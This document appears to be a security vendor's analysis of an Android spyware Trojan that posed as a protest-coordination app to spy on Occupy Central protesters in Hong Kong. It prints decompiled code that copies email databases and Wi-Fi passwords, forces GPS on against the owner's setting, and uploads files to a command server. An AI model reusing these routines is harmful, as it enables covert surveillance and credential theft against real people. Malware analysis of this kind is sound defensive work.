This Trojan for Android is designed to spy on protesters of the Occupy Central movement in Hong Kong. This malicious program gathers most detailed information about the users, including their location and circle of contacts and other confidential information. It is distributed as a program for coordination of protest activities.
When launched, the program deletes its icon from the home screen and later operates as the system service StreamService, which performs all malicious activities.
The control servers are located at the following addresses:
- mm.[xxxx]dy.com
- xx.xx.11.75
- xx.xxx.58.202
When connected to the command and control center, Android.SpyHK.1.origin checks the availability of all these domains, however, priority is given to the first one. Connecting to available server's port 1430, Android.SpyHK.1.origin by means of the socket downloads the detailed information on the infected device, namely:
- IMEI
- Phone number
- Device model
- Operator
- SIM card ID
- Data on the maximum processor frequency
- Data on RAM amount
- OS version
- Contents of system logs
- MAC address
- Available Internet connection
- Current IP address
In response, the Trojan receives control commands as encrypted bytes:
try {
v2_9 = new byte[v2_7];
v17.read(v2_9);
v3_3 = b.a(v2_9); //the first 2 bytes contain the command.
v4 = new byte[2];
v17.read(v4);
v16 = b.a(v4); //the subsequent 2 bytes—
//identifier that is sent back to the command and
//control server along with the report.
v2_9 = new byte[4];
v17.read(v2_9);
int v5 = b.c(v2_9); //the subsequent 4 bytes indicate the size
//of the command parameter, that is extracted later
ByteArrayOutputStream v6 = new ByteArrayOutputStream(v5);
byte[] v7 = new byte[1024];
v2_7 = 0;
while(v2_7 < v5) {
int v8 = v17.read(v7);
v2_7 += v8;
v6.write(v7, 0, v8);
}Android.SpyHK.1.origin can carry out the following actions on an infected device:
- Read the contents of a specified directory (names, size, and last modified dates for files and folders in the directory)
- Acquire the device's GPS coordinates
- Add an entry to the log file
- Output a message with the specified text on the screen
- Call a specified number
- Gather information about the device
- Execute a specified shell script
- Get an extended contact list (including names, phone numbers and email addresses)
- Gain access to the SMS correspondence
- Get the call history
- Add specific phone numbers to the list of individuals being eavesdropped on
- Obtain the current list of individuals being eavesdropped on
- Download a file from a designated web address
- Delete a specified file from the device
- Upload a specified file to the command and control server
- Activate the voice recorder after a specified time interval
- Activate voice recording and simultaneously stream the recording onto the server's socket
- Stop voice recording
- Upload the mail database of the default mail client onto the server
- Acquire browsing history
- Send information about files and directories found on the SD card to the command and control server
- Execute multiple commands to gather sensitive information and send it to the server
The list of phone numbers for eavesdropping is downloaded from the command and control server and stored at /data/data/com.v1/.record/. This list has the following structure:
"in_/out_" + PhoneReceiver.c + "_" + new SimpleDateFormat("yyyyMMdd_HHmmss").format(new Date(
System.currentTimeMillis()));Here in_ provides incoming call values, while out_ contains values for outbound calls. "PhoneReceiver.c" indicates the target phone number.
To acquire information about email correspondence, Android.SpyHK.1.origin copies all available database files of the default mail client into its local directory.
public final void run() {
new a();
a.a("cat /data/data/com.android.email/databases/EmailProvider.db >
/data/data/com.v1/email.db");
new a();
a.a("cat /data/data/com.android.email/databases/EmailProviderBody.db >
/data/data/com.v1/emailbody.db");
new a();
a.a("chmod 777 /data/data/com.v1/email.db");
new a();
a.a("chmod 777 /data/data/com.v1/emailbody.db");
}Then the program aggregates the acquired information in two files, /data/data/com.v1/emailAccount.txt и /data/data/com.v1/email.html.
Information about email accounts associated with the device, including the corresponding email address, login and encrypted password is stored in the file Account.txt:
query("HostAuth", new String[]{"address", "login", "password"}, null, null, null, null, null)The file email.html contains detailed information about email cache including message recipients, subject, time stamp of sending and contents of the emails.
query("Message", new String[]{"_id", "displayName", "subject", "timeStamp",
"fromList", "toList"}, null, null, null, null, null);
query("Body", new String[]{"htmlContent"}, "messageKey = ?",
new String[]{v11.getString(v11.getColumnIndex("_id"))}, null, null, null);The file email.html is formatted as an html document:
v10.append(":" + v11.getString(v11.getColumnIndex("fromList")));
v10.append("<br/>");
v10.append(":" + v11.getString(v11.getColumnIndex("toList")));
v10.append("<br/>");
v10.append(":" + v9.format(newDate(Long.valueOf(Long.parseLong(v11.getString(
v11.getColumnIndex("timeStamp")))).longValue())));
v10.append("<br/>");
v10.append("<br/>");
v10.append(":" + v11.getString(v11.getColumnIndex("subject")));
v10.append("<br/>");
v10.append("<br/>");
Cursor v2_1 = v1_3.query("Body", new String[]{"htmlContent"}, "messageKey = ?",
new String[]{v11.getString(v11.getColumnIndex("_id"))},
null, null, null);
if(v2_1.moveToNext()) {
v10.append(v2_1.getString(v2_1.getColumnIndex("htmlContent")));
}
v10.append("<hr color=red/><br/>");The files emailAccount.txt, email.html, email.db, and emailbody.db are uploaded to the remote server.
The following routine is used to acquire information about data stored on the memory card:
private void b(String arg6) { // значение "arg6" соответствует "/sdcard/"
File[] v2 = new File(arg6).listFiles();
if(v2 != null) {
int v0;
for(v0 = 0; v0 < v2.length; ++v0) {
try {
if(v2[v0].isDirectory()) {
e.a.write(String.valueOf(v2[v0].getAbsolutePath()) + "/");
}
else {
e.a.write(v2[v0].getAbsolutePath());
}
e.a.write("\r\n");
}
catch(IOException v1) {
v1.printStackTrace();
}
if(v2[v0].isDirectory()) {
this.b(v2[v0].getAbsolutePath());
}
}
}If the malware executes an instruction to gather general information, Android.SpyHK.1.origin will send the following information to the server:
- Information about the infected device
- Available contact information
- Call history
- SMS correspondence
- Browser history
- Email account information
- information about the files on the memory card
- Available information about Wi-Fi networks including access passwords
Data related to Wi-Fi is retrieved using the following routine:
v3_1 = "/data/data/com.v1/" +
"/data/misc/wifi/wpa_supplicant.conf".substring("/data/misc/wifi/wpa_supplicant.conf"
.lastIndexOf("/") + 1);
new com.v1.a.a();
com.v1.a.a.a("cat " + "/data/misc/wifi/wpa_supplicant.conf" + " > " + v3_1);
new com.v1.a.a();
com.v1.a.a.a("chmod 777 " + v3_1);Android.SpyHK.1.origin can exploit a known vulnerability of the power control widget to enable the device's GPS receiver. As the result, in some cases the malicious program can acquire GPS coordinates, even if the receiver has been disabled by the device's owner:
Intent v0 = new Intent();
v0.setClassName("com.android.settings",
"com.android.settings.widget.SettingsAppWidgetProvider");
v0.addCategory("android.intent.category.ALTERNATIVE");
v0.setData(Uri.parse("custom:3"));
try {
PendingIntent.getBroadcast(this.b, 0, v0, 0).send();Also, the Trojan uses the following routines for operations with local files:
v2_10 = b.b(v2_9);
v3_1 = "/data/data/com.v1/" + v2_10.substring(v2_10.lastIndexOf("/") + 1);
new com.v1.a.a();
com.v1.a.a.a("cat " + v2_10 + " > " + v3_1); //overwrite the contents of a specified file
from its directory to a temporary file
new com.v1.a.a();
com.v1.a.a.a("chmod 777 " + v3_1);
if((new File(v3_1).exists()) && new File(v3_1).length() != 0) {
new g(this, v3_1, v19.h()).start(); //sends a temporary file to the command and control server
}